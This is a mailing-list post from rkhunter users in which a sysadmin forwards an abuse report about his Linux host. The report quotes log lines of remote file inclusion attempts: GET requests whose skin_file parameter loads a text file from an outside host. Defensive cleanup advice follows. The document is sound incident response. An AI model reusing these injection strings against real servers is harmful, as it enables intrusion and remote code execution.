Hi all!
I got the report below this morning, ive run the rkhunter and it
reports no rootkit. Anyone seen this before? The computer using the ip-
adress is a linux-machine.
------
[EMAIL PROTECTED] - Sun Dec 02 17:20:21 2007]:
Greetings:
IP Address of attacker: xxx.yyy.zzz.zzz
Type of attack: URL Injection -- attempt to inject / load files onto the
server via PHP/CGI vulnerabilities
Sample log report including date and time stamp:
Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:16:59:21
-0800] "GET
/logos/banners//index.php?skin_file=http://www.n0n-clan.net//vwar/convert/te
st.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"
Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:16:59:22
-0800] "GET
//index.php?skin_file=http://www.n0n-clan.net//vwar/convert/test.txt?
HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"
Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:16:59:22
-0800] "GET
/logos//index.php?skin_file=http://www.n0n-clan.net//vwar/convert/test.txt?
HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"
Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:17:00:16
-0800] "GET
/logos/banners//index.php?skin_file=http://www.rjscomputers.co.uk/cslivehelp
/txt-db-api/remot.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"
Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:17:00:16
-0800] "GET
//index.php?skin_file=http://www.rjscomputers.co.uk/cslivehelp/txt-db-api/re
mot.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"
Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:17:00:17
-0800] "GET
/logos//index.php?skin_file=http://www.rjscomputers.co.uk/cslivehelp/txt-db-
api/remot.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"
NOTES:
URL Injection attacks typically mean the server for which the IP
address of
the attacker is bound is a compromised server. Please check the server
behind the IP address above for suspicious files in /tmp, /var/tmp,
/dev/shm, along with checking the process tree (ps -efl or ps -auwx).
You
may also want to check out http://www.chkrootkit.org/ and
http://www.rootkit.nl/ as tools which should be used in addition to
checking
the directories and process tree. Please use "ls -lab" for checking
directories as sometimes compromised servers will have hidden files
that a
regular "ls" will not show.
-----------
/
Best wishes!
- -
Johan Sundström
Västerbottens museum
Box 3183
903 04 Umeå
Tel. 090 - 17 18 33
Mobiltel. 070 - 321 84 04
E-post. [EMAIL PROTECTED]
www . http://www.vasterbottensmuseum.se
-------------------------------------------------------------------------
SF.Net email is sponsored by: The Future of Linux Business White Paper
from Novell. From the desktop to the data center, Linux is going
mainstream. Let it simplify your IT future.
http://altfarm.mediaplex.com/ad/ck/8857-50307-18918-4
_______________________________________________
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users
